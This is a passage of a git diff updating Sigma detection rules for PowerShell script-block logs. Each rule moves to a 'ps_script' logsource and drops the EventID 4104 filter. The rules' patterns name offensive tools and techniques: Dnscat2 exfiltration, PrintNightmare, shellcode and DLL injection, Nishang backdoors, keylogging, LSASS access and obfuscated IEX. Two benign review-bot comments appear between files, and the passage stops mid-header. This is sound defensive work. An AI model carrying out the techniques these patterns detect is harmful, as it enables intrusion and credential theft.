--- a/rules/windows/powershell/powershell_script/powershell_dnscat_execution.yml +++ b/rules/windows/powershell/powershell_script/powershell_dnscat_execution.yml @@ -4,7 +4,7 @@ description: Dnscat exfiltration tool execution status: experimental author: Daniil Yugoslavskiy, oscd.community date: 2019/10/24 -modified: 2020/08/24 +modified: 2021/10/16 tags: - attack.exfiltration - attack.t1048 @@ -13,11 +13,10 @@ tags: - attack.t1086 # an old one logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: selection: - EventID: 4104 ScriptBlockText|contains: "Start-Dnscat2" condition: selection falsepositives: diff --git a/rules/windows/powershell/powershell_script/powershell_icmp_exfiltration.yml b/rules/windows/powershell/powershell_script/powershell_icmp_exfiltration.yml index a9d9036a..b6479213 100644 --- a/rules/windows/powershell/powershell_script/powershell_icmp_exfiltration.yml +++ b/rules/windows/powershell/powershell_script/powershell_icmp_exfiltration.yml @@ -6,16 +6,16 @@ references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md#atomic-test-2---exfiltration-over-alternative-protocol---icmp author: 'Bartlomiej Czyz @bczyz1, oscd.community' date: 2020/10/10 +modified: 2021/10/16 tags: - attack.exfiltration - attack.t1048.003 logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: selection: - EventID: 4104 ScriptBlockText|contains|all: - 'New-Object' - 'System.Net.NetworkInformation.Ping' diff --git a/rules/windows/powershell/powershell_script/powershell_invoke_nightmare.yml b/rules/windows/powershell/powershell_script/powershell_invoke_nightmare.yml index 553f535e..5ad5d027 100644 --- a/rules/windows/powershell/powershell_script/powershell_invoke_nightmare.yml +++ b/rules/windows/powershell/powershell_script/powershell_invoke_nightmare.yml 
@@ -3,17 +3,16 @@ id: 6d3f1399-a81c-4409-aff3-1ecfe9330baf status: test description: Detects Commandlet name for PrintNightmare exploitation. date: 2021/08/09 -modified: 2021/08/31 +modified: 2021/10/16 references: - https://github.com/calebstewart/CVE-2021-1675 author: Max Altgelt, Tobias Michalski logsource: product: windows - service: powershell + category: ps_script definition: Script Block Logging must be enable detection: selection: - EventID: 4104 ScriptBlockText|contains: Invoke-Nightmare condition: selection falsepositives: diff --git a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_clip_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_clip_in_scriptblocktext.yml index 3d0f3df1..b4aa1b05 100644 --- a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_clip_in_scriptblocktext.yml +++ b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_clip_in_scriptblocktext.yml @@ -4,7 +4,7 @@ description: Detects Obfuscated use of Clip.exe to execute PowerShell status: experimental author: Jonathan Cheong, oscd.community date: 2020/10/13 -modified: 2021/10/07 +modified: 2021/10/16 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task 26) tags: @@ -14,11 +14,10 @@ tags: - attack.t1059.001 logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: selection_4104: - EventID: 4104 ScriptBlockText|re: '.*cmd.{0,5}(?:\/c|\/r).+clip(?:\.exe)?.{0,4}&&.+clipboard]::\(\s\\\"\{\d\}.+\-f.+\"' condition: selection_4104 falsepositives: diff --git a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_obfuscated_iex_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_obfuscated_iex_in_scriptblocktext.yml index 687ea802..370d23f6 100644 
--- a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_obfuscated_iex_in_scriptblocktext.yml +++ b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_obfuscated_iex_in_scriptblocktext.yml @@ -4,7 +4,7 @@ description: "Detects all variations of obfuscated powershell IEX invocation cod status: experimental author: Daniel Bohannon (@Mandiant/@FireEye), oscd.community date: 2019/11/08 -modified: 2021/10/07 +modified: 2021/10/16 tags: - attack.defense_evasion - attack.t1027 @@ -13,12 +13,10 @@ tags: - attack.t1086 #an old one logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: - selection_1: - EventID: 4104 - selection_2: + selection_iex: - ScriptBlockText|re: '\$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[' - ScriptBlockText|re: '\$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[' - ScriptBlockText|re: '\$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[' @@ -26,7 +24,7 @@ detection: - ScriptBlockText|re: '\\\\*mdr\\\\*\W\s*\)\.Name' - ScriptBlockText|re: '\$VerbosePreference\.ToString\(' - ScriptBlockText|re: '\String\]\s*\$VerbosePreference' - condition: selection_1 and selection_2 + condition: selection_iex falsepositives: - Unknown level: high diff --git a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_stdin_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_stdin_in_scriptblocktext.yml index 2cb8ef01..334e424a 100644 --- a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_stdin_in_scriptblocktext.yml +++ b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_stdin_in_scriptblocktext.yml 
@@ -4,7 +4,7 @@ description: Detects Obfuscated use of stdin to execute PowerShell status: experimental author: Jonathan Cheong, oscd.community date: 2020/10/15 -modified: 2021/10/07 +modified: 2021/10/16 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task 25) tags: @@ -14,11 +14,10 @@ tags: - attack.t1059.001 logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: selection_4104: - EventID: 4104 ScriptBlockText|re: '.*cmd.{0,5}(?:\/c|\/r).+powershell.+(?:\$\{?input\}?|noexit).+\"' condition: selection_4104 falsepositives: diff --git a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_var_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_var_in_scriptblocktext.yml index c0460b5f..ae25eadb 100644 --- a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_var_in_scriptblocktext.yml +++ b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_var_in_scriptblocktext.yml @@ -4,7 +4,7 @@ description: Detects Obfuscated use of Environment Variables to execute PowerShe status: experimental author: Jonathan Cheong, oscd.community date: 2020/10/15 -modified: 2021/10/07 +modified: 2021/10/16 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task 24) tags: @@ -14,11 +14,10 @@ tags: - attack.t1059.001 logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: selection_4104: - EventID: 4104 ScriptBlockText|re: '.*cmd.{0,5}(?:\/c|\/r)(?:\s|)\"set\s[a-zA-Z]{3,6}.*(?:\{\d\}){1,}\\\"\s+?\-f(?:.*\)){1,}.*\"' condition: selection_4104 falsepositives: 
diff --git a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_compress_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_compress_in_scriptblocktext.yml index 3151cae7..3a4a5231 100644 --- a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_compress_in_scriptblocktext.yml +++ b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_compress_in_scriptblocktext.yml @@ -4,7 +4,7 @@ description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION status: experimental author: Timur Zinniatullin, oscd.community date: 2020/10/18 -modified: 2021/10/07 +modified: 2021/10/16 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task 19) tags: @@ -14,11 +14,10 @@ tags: - attack.t1059.001 logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: selection_4104: - EventID: 4104 ScriptBlockText|re: '(?i).*new-object.*(?:system\.io\.compression\.deflatestream|system\.io\.streamreader).*text\.encoding\]::ascii.*readtoend' condition: selection_4104 falsepositives: diff --git a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_rundll_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_rundll_in_scriptblocktext.yml index b17ab890..e4d2ad84 100644 --- a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_rundll_in_scriptblocktext.yml +++ b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_rundll_in_scriptblocktext.yml @@ -4,7 +4,7 @@ description: Detects Obfuscated Powershell via RUNDLL LAUNCHER status: experimental author: Timur Zinniatullin, oscd.community date: 2020/10/18 -modified: 2021/10/07 +modified: 2021/10/16 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task 23) tags: 
@@ -14,11 +14,10 @@ tags: - attack.t1059.001 logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: selection_4104: - EventID: 4104 ScriptBlockText|re: '(?i).*rundll32(?:\.exe)?(?:\s+)?shell32\.dll.*shellexec_rundll.*powershell.*\"' condition: selection_4104 falsepositives: diff --git a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_stdin_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_stdin_in_scriptblocktext.yml index c2b5f127..73cfb7ba 100644 --- a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_stdin_in_scriptblocktext.yml +++ b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_stdin_in_scriptblocktext.yml @@ -4,7 +4,7 @@ description: Detects Obfuscated Powershell via Stdin in Scripts status: experimental author: Nikita Nazarov, oscd.community date: 2020/10/12 -modified: 2021/10/07 +modified: 2021/10/16 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task28) tags: @@ -14,11 +14,10 @@ tags: - attack.t1059.001 logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: selection_4104: - EventID: 4104 ScriptBlockText|re: '(?i).*(set).*&&\s?set.*(environment|invoke|\${?input).*&&.*"' condition: selection_4104 falsepositives: diff --git a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_use_clip_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_use_clip_in_scriptblocktext.yml index 9205a254..d2898f76 100644 --- a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_use_clip_in_scriptblocktext.yml +++ b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_use_clip_in_scriptblocktext.yml 
@@ -4,7 +4,7 @@ description: Detects Obfuscated Powershell via use Clip.exe in Scripts status: experimental author: Nikita Nazarov, oscd.community date: 2020/10/09 -modified: 2021/10/07 +modified: 2021/10/16 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task29) tags: @@ -14,11 +14,10 @@ tags: - attack.t1059.001 logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: selection_4104: - EventID: 4104 ScriptBlockText|re: '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*' condition: selection_4104 falsepositives: diff --git a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_use_mhsta_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_use_mhsta_in_scriptblocktext.yml index d6455878..87a4ae6d 100644 --- a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_use_mhsta_in_scriptblocktext.yml +++ b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_use_mhsta_in_scriptblocktext.yml @@ -4,7 +4,7 @@ description: Detects Obfuscated Powershell via use MSHTA in Scripts status: experimental author: Nikita Nazarov, oscd.community date: 2020/10/08 -modified: 2021/10/07 +modified: 2021/10/16 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task31) tags: @@ -14,11 +14,10 @@ tags: - attack.t1059.001 logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: selection_4104: - EventID: 4104 ScriptBlockText|re: '(?i).*(set).*(&&).*(mshta).*(vbscript:createobject).*(\.run).*\(window\.close\).*"' condition: selection_4104 falsepositives: 
diff --git a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_use_rundll32_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_use_rundll32_in_scriptblocktext.yml index 516fc3fc..b910c083 100644 --- a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_use_rundll32_in_scriptblocktext.yml +++ b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_use_rundll32_in_scriptblocktext.yml @@ -4,7 +4,7 @@ description: Detects Obfuscated Powershell via use Rundll32 in Scripts status: experimental author: Nikita Nazarov, oscd.community date: 2019/10/08 -modified: 2021/10/07 +modified: 2021/10/16 references: - https://github.com/Neo23x0/sigma/issues/1009 tags: @@ -14,11 +14,10 @@ tags: - attack.t1059.001 logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: selection_4104: - EventID: 4104 ScriptBlockText|re: '(?i).*&&.*rundll32.*shell32\.dll.*shellexec_rundll.*(value|invoke|comspec|iex).*"' condition: selection_4104 falsepositives: diff --git a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_var_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_var_in_scriptblocktext.yml index cec226f8..b81f4aa0 100644 --- a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_var_in_scriptblocktext.yml +++ b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_var_in_scriptblocktext.yml @@ -4,7 +4,7 @@ description: Detects Obfuscated Powershell via VAR++ LAUNCHER status: experimental author: Timur Zinniatullin, oscd.community date: 2020/10/13 -modified: 2021/10/07 +modified: 2021/10/16 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task27) tags: 
@@ -14,11 +14,10 @@ tags: - attack.t1059.001 logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: selection_4104: - EventID: 4104 ScriptBlockText|re: '(?i).*&&set.*(\{\d\}){2,}\\\"\s+?\-f.*&&.*cmd.*\/c' # FPs with |\/r condition: selection_4104 falsepositives: diff --git a/rules/windows/powershell/powershell_script/powershell_keylogging.yml b/rules/windows/powershell/powershell_script/powershell_keylogging.yml index 82274561..6e2b8b56 100644 --- a/rules/windows/powershell/powershell_script/powershell_keylogging.yml +++ b/rules/windows/powershell/powershell_script/powershell_keylogging.yml @@ -3,6 +3,7 @@ id: 34f90d3c-c297-49e9-b26d-911b05a4866c status: experimental author: frack113 date: 2021/07/30 +modified: 2021/10/16 description: Adversaries may log user keystrokes to intercept credentials as the user types them. references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md @@ -12,18 +13,16 @@ tags: - attack.t1056.001 logsource: product: windows - service: powershell + category: ps_script definition: EnableScriptBlockLogging must be set to enable detection: - selection_id: - EventID: 4104 selection_basic: ScriptBlockText|contains: 'Get-Keystrokes' selection_high: # want to run in background and keyboard ScriptBlockText|contains|all: - 'Get-ProcAddress user32.dll GetAsyncKeyState' - 'Get-ProcAddress user32.dll GetForegroundWindow' - condition: selection_id and (selection_basic or selection_high) + condition: selection_basic or selection_high falsepositives: - Unknown level: medium diff --git a/rules/windows/powershell/powershell_script/powershell_malicious_commandlets.yml b/rules/windows/powershell/powershell_script/powershell_malicious_commandlets.yml index 34c4ccb0..8b414ae9 100644 --- a/rules/windows/powershell/powershell_script/powershell_malicious_commandlets.yml +++ b/rules/windows/powershell/powershell_script/powershell_malicious_commandlets.yml 
@@ -10,14 +10,13 @@ tags: - attack.t1086 #an old one author: Sean Metcalf (source), Florian Roth (rule), Bartlomiej Czyz @bczyz1 (update), oscd.community (update) date: 2017/03/05 -modified: 2021/08/21 +modified: 2021/10/16 logsource: product: windows - service: powershell + category: ps_script definition: Script Block Logging must be enable detection: select_Malicious: - EventID: 4104 ScriptBlockText|contains: - "Invoke-DllInjection" - "Invoke-Shellcode" diff --git a/rules/windows/powershell/powershell_script/powershell_malicious_keywords.yml b/rules/windows/powershell/powershell_script/powershell_malicious_keywords.yml index 071f3725..c8c39243 100644 --- a/rules/windows/powershell/powershell_script/powershell_malicious_keywords.yml +++ b/rules/windows/powershell/powershell_script/powershell_malicious_keywords.yml @@ -10,14 +10,13 @@ tags: - attack.t1086 #an old one author: Sean Metcalf (source), Florian Roth (rule) date: 2017/03/05 -modified: 2021/08/21 +modified: 2021/10/16 logsource: product: windows - service: powershell + category: ps_script definition: 'It is recommended to use the new "Script Block Logging" of PowerShell v5 https://adsecurity.org/?p=2277' detection: Malicious: - EventID: 4104 ScriptBlockText|contains: - "AdjustTokenPrivileges" - "IMAGE_NT_OPTIONAL_HDR64_MAGIC" diff --git a/rules/windows/powershell/powershell_script/powershell_memorydump_getstoragediagnosticinfo.yml b/rules/windows/powershell/powershell_script/powershell_memorydump_getstoragediagnosticinfo.yml index 79ef1050..f4ec3937 100644 --- a/rules/windows/powershell/powershell_script/powershell_memorydump_getstoragediagnosticinfo.yml +++ b/rules/windows/powershell/powershell_script/powershell_memorydump_getstoragediagnosticinfo.yml 
@@ -3,6 +3,7 @@ id: cd185561-4760-45d6-a63e-a51325112cae status: experimental description: Detects usage of a PowerShell command to dump the live memory of a Windows machine date: 2021/09/21 +modified: 2021/10/16 references: - https://docs.microsoft.com/en-us/powershell/module/storage/get-storagediagnosticinfo tags: @@ -10,11 +11,10 @@ tags: author: Max Altgelt logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: dump: - EventID: 4104 ScriptBlockText|contains|all: - 'Get-StorageDiagnosticInfo' - '-IncludeLiveDump' diff --git a/rules/windows/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml b/rules/windows/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml index 90b3e7a7..91dda505 100644 --- a/rules/windows/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml +++ b/rules/windows/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml @@ -3,7 +3,7 @@ id: f772cee9-b7c2-4cb2-8f07-49870adc02e0 status: experimental description: Detects Commandlet names and arguments from the Nishang exploitation framework date: 2019/05/16 -modified: 2021/08/21 +modified: 2021/10/16 references: - https://github.com/samratashok/nishang tags: @@ -13,11 +13,10 @@ tags: author: Alec Costello logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: Nishang: - EventID: 4104 ScriptBlockText|contains: - Add-ConstrainedDelegationBackdoor - Set-DCShadowPermissions diff --git a/rules/windows/powershell/powershell_script/powershell_ntfs_ads_access.yml b/rules/windows/powershell/powershell_script/powershell_ntfs_ads_access.yml index 1c6f3018..f298d3d4 100644 --- a/rules/windows/powershell/powershell_script/powershell_ntfs_ads_access.yml +++ b/rules/windows/powershell/powershell_script/powershell_ntfs_ads_access.yml 
@@ -14,14 +14,12 @@ tags: - attack.t1086 # an old one author: Sami Ruohonen date: 2018/07/24 -modified: 2021/08/21 +modified: 2021/10/16 logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: - event: - EventID: 4104 content: ScriptBlockText|contains: - "set-content" diff --git a/rules/windows/powershell/powershell_script/powershell_powerview_malicious_commandlets.yml b/rules/windows/powershell/powershell_script/powershell_powerview_malicious_commandlets.yml index 1b2b7454..d72b29a3 100644 --- a/rules/windows/powershell/powershell_script/powershell_powerview_malicious_commandlets.yml +++ b/rules/windows/powershell/powershell_script/powershell_powerview_malicious_commandlets.yml @@ -3,7 +3,7 @@ id: dcd74b95-3f36-4ed9-9598-0490951643aa status: experimental description: Detects Commandlet names from PowerView of PowerSploit exploitation framework. date: 2021/05/18 -modified: 2021/08/21 +modified: 2021/10/16 references: - https://powersploit.readthedocs.io/en/stable/Recon/README - https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon @@ -15,11 +15,10 @@ tags: author: Bhabesh Raj logsource: product: windows - service: powershell + category: ps_script definition: Script Block Logging must be enable detection: selection: - EventID: 4104 ScriptBlockText|contains: - Export-PowerViewCSV - Get-IPAddress diff --git a/rules/windows/powershell/powershell_script/powershell_prompt_credentials.yml b/rules/windows/powershell/powershell_script/powershell_prompt_credentials.yml index b3d5e713..a795e8d1 100644 --- a/rules/windows/powershell/powershell_script/powershell_prompt_credentials.yml +++ b/rules/windows/powershell/powershell_script/powershell_prompt_credentials.yml 
@@ -12,14 +12,13 @@ tags: - attack.t1086 # an old one author: John Lambert (idea), Florian Roth (rule) date: 2017/04/09 -modified: 2021/08/04 +modified: 2021/10/16 logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: selection: - EventID: 4104 ScriptBlockText|contains: 'PromptForCredential' condition: selection falsepositives: diff --git a/rules/windows/powershell/powershell_script/powershell_psattack.yml b/rules/windows/powershell/powershell_script/powershell_psattack.yml index 8e178cb4..12144627 100644 --- a/rules/windows/powershell/powershell_script/powershell_psattack.yml +++ b/rules/windows/powershell/powershell_script/powershell_psattack.yml @@ -10,14 +10,13 @@ tags: - attack.t1086 #an old one author: Sean Metcalf (source), Florian Roth (rule) date: 2017/03/05 -modified: 2021/08/21 +modified: 2021/10/16 logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: selection: - EventID: 4104 ScriptBlockText|contains: 'PS ATTACK!!!' condition: selection falsepositives: diff --git a/rules/windows/powershell/powershell_script/powershell_shellcode_b64.yml b/rules/windows/powershell/powershell_script/powershell_shellcode_b64.yml index 45ea2909..9cad56ae 100644 --- a/rules/windows/powershell/powershell_script/powershell_shellcode_b64.yml +++ b/rules/windows/powershell/powershell_script/powershell_shellcode_b64.yml @@ -13,14 +13,13 @@ tags: - attack.t1086 #an old one author: David Ledbetter (shellcode), Florian Roth (rule) date: 2018/11/17 -modified: 2020/12/01 +modified: 2021/10/16 logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: selection: - EventID: 4104 ScriptBlockText|contains: 'AAAAYInlM' selection2: ScriptBlockText|contains: 
diff --git a/rules/windows/powershell/powershell_script/powershell_shellintel_malicious_commandlets.yml b/rules/windows/powershell/powershell_script/powershell_shellintel_malicious_commandlets.yml index 62dfb25f..3dd0824c 100644 --- a/rules/windows/powershell/powershell_script/powershell_shellintel_malicious_commandlets.yml +++ b/rules/windows/powershell/powershell_script/powershell_shellintel_malicious_commandlets.yml @@ -3,7 +3,7 @@ id: 402e1e1d-ad59-47b6-bf80-1ee44985b3a7 status: experimental description: Detects Commandlet names from ShellIntel exploitation scripts. date: 2021/08/09 -modified: 2021/08/21 +modified: 2021/10/16 references: - https://github.com/Shellntel/scripts/ tags: @@ -12,11 +12,10 @@ tags: author: Max Altgelt, Tobias Michalski logsource: product: windows - service: powershell + category: ps_script definition: Script Block Logging must be enable detection: selection: - EventID: 4104 ScriptBlockText|contains: - Invoke-SMBAutoBrute - Invoke-GPOLinks diff --git a/rules/windows/powershell/powershell_script/powershell_store_file_in_alternate_data_stream.yml b/rules/windows/powershell/powershell_script/powershell_store_file_in_alternate_data_stream.yml index 070ace3c..c299fe7e 100644 --- a/rules/windows/powershell/powershell_script/powershell_store_file_in_alternate_data_stream.yml +++ b/rules/windows/powershell/powershell_script/powershell_store_file_in_alternate_data_stream.yml @@ -3,6 +3,7 @@ id: a699b30e-d010-46c8-bbd1-ee2e26765fe9 status: experimental author: frack113 date: 2021/09/02 +modified: 2021/10/16 description: Storing files in Alternate Data Stream (ADS) similar to Astaroth malware. references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md 
@@ -11,18 +12,16 @@ tags: - attack.t1564.004 logsource: product: windows - service: powershell + category: ps_script definition: EnableScriptBlockLogging must be set to enable detection: - selection_id: - EventID: 4104 selection_compspec: ScriptBlockText|contains|all: - 'Start-Process' - '-FilePath "$env:comspec" ' - '-ArgumentList ' - '>' - condition: selection_id and selection_compspec + condition: selection_compspec falsepositives: - Unknown level: medium \ No newline at end of file diff --git a/rules/windows/powershell/powershell_script/powershell_susp_zip_compress_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_susp_zip_compress_in_scriptblocktext.yml index 1073d0a1..8053fe55 100644 --- a/rules/windows/powershell/powershell_script/powershell_susp_zip_compress_in_scriptblocktext.yml +++ b/rules/windows/powershell/powershell_script/powershell_susp_zip_compress_in_scriptblocktext.yml @@ -3,7 +3,7 @@ id: b7a3c9a3-09ea-4934-8864-6a32cacd98d9 status: experimental author: frack113 date: 2021/07/20 -modified: 2021/10/09 +modified: 2021/10/16 description: Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md @@ -12,11 +12,10 @@ tags: - attack.t1074.001 logsource: product: windows - service: powershell + category: ps_script definition: Script Block Logging must be enable detection: selection_4104: - EventID: 4104 ScriptBlockText|contains|all: - 'Compress-Archive ' - ' -Path ' diff --git a/rules/windows/powershell/powershell_script/powershell_suspicious_export_pfxcertificate.yml b/rules/windows/powershell/powershell_script/powershell_suspicious_export_pfxcertificate.yml index b39cf109..0f99583d 100644 --- a/rules/windows/powershell/powershell_script/powershell_suspicious_export_pfxcertificate.yml 
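Review bot: powershell_store_file_in_alternate_data_stream.yml is edited here but still ends with `\ No newline at end of file` after `level: medium`; since the file is already being touched, the trailing newline should be added so YAML linters and future diffs stay clean. Separately, the `'-FilePath "$env:comspec" '` value keeps a trailing space inside the quotes, which is presumably intentional to require a following argument but would benefit from a short `#` comment saying so, since a reviewer could easily "fix" it away.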
+++ b/rules/windows/powershell/powershell_script/powershell_suspicious_export_pfxcertificate.yml @@ -13,11 +13,10 @@ date: 2021/04/23 modified: 2021/08/04 logsource: product: windows - service: powershell + category: ps_script definition: Script Block Logging must be enable detection: PfxCertificate: - EventID: 4104 ScriptBlockText|contains: "Export-PfxCertificate" condition: PfxCertificate falsepositives: diff --git a/rules/windows/powershell/powershell_script/powershell_suspicious_getprocess_lsass.yml b/rules/windows/powershell/powershell_script/powershell_suspicious_getprocess_lsass.yml index eccd3337..2af43b59 100644 --- a/rules/windows/powershell/powershell_script/powershell_suspicious_getprocess_lsass.yml +++ b/rules/windows/powershell/powershell_script/powershell_suspicious_getprocess_lsass.yml @@ -9,14 +9,13 @@ tags: - attack.t1003.001 author: Florian Roth date: 2021/04/23 -modified: 2021/08/04 +modified: 2021/10/16 logsource: product: windows - service: powershell + category: ps_script definition: Script Block Logging must be enable detection: select_LSASS: - EventID: 4104 ScriptBlockText|contains: 'Get-Process lsass' condition: select_LSASS falsepositives: diff --git a/rules/windows/powershell/powershell_script/powershell_suspicious_keywords.yml b/rules/windows/powershell/powershell_script/powershell_suspicious_keywords.yml index 17910236..a37fa3fe 100644 --- a/rules/windows/powershell/powershell_script/powershell_suspicious_keywords.yml +++ b/rules/windows/powershell/powershell_script/powershell_suspicious_keywords.yml @@ -3,7 +3,7 @@ id: 1f49f2ab-26bc-48b3-96cc-dcffbc93eadf status: experimental description: Detects keywords that could indicate the use of some PowerShell exploitation framework date: 2019/02/11 -modified: 2021/08/30 +modified: 2021/10/16 author: Florian Roth, Perez Diego (@darkquassar) references: - https://posts.specterops.io/entering-a-covenant-net-command-and-control-e11038bcf462 
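Review bot: powershell_suspicious_export_pfxcertificate.yml changes its logsource and drops `EventID: 4104` but, unlike every other rule in this batch, leaves `modified: 2021/08/04` untouched (it appears as context in the `@@ -13,11 +13,10 @@` hunk). A logsource change is a behavioral change for consumers pinning on `modified`, so the line should be bumped to match the rest of the commit: `modified: 2021/10/16`.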
@@ -16,11 +16,10 @@ tags: - attack.t1086 #an old one logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled for 4104 detection: framework: - EventID: 4104 ScriptBlockText|contains: - "System.Reflection.Assembly.Load($" - "[System.Reflection.Assembly]::Load($" diff --git a/rules/windows/powershell/powershell_script/powershell_suspicious_mail_acces.yml b/rules/windows/powershell/powershell_script/powershell_suspicious_mail_acces.yml index 18b6b460..b89413bb 100644 --- a/rules/windows/powershell/powershell_script/powershell_suspicious_mail_acces.yml +++ b/rules/windows/powershell/powershell_script/powershell_suspicious_mail_acces.yml @@ -3,6 +3,7 @@ id: 2837e152-93c8-43d2-85ba-c3cd3c2ae614 status: experimental author: frack113 date: 2021/07/21 +modified: 2021/10/16 description: Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files. references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md @@ -11,11 +12,10 @@ tags: - attack.t1114.001 logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: selection: - EventID: 4104 ScriptBlockText|contains: - 'Get-Inbox.ps1' - 'Microsoft.Office.Interop.Outlook' diff --git a/rules/windows/powershell/powershell_script/powershell_suspicious_mounted_share_deletion.yml b/rules/windows/powershell/powershell_script/powershell_suspicious_mounted_share_deletion.yml index 941ef606..968a3d47 100644 --- a/rules/windows/powershell/powershell_script/powershell_suspicious_mounted_share_deletion.yml +++ b/rules/windows/powershell/powershell_script/powershell_suspicious_mounted_share_deletion.yml 
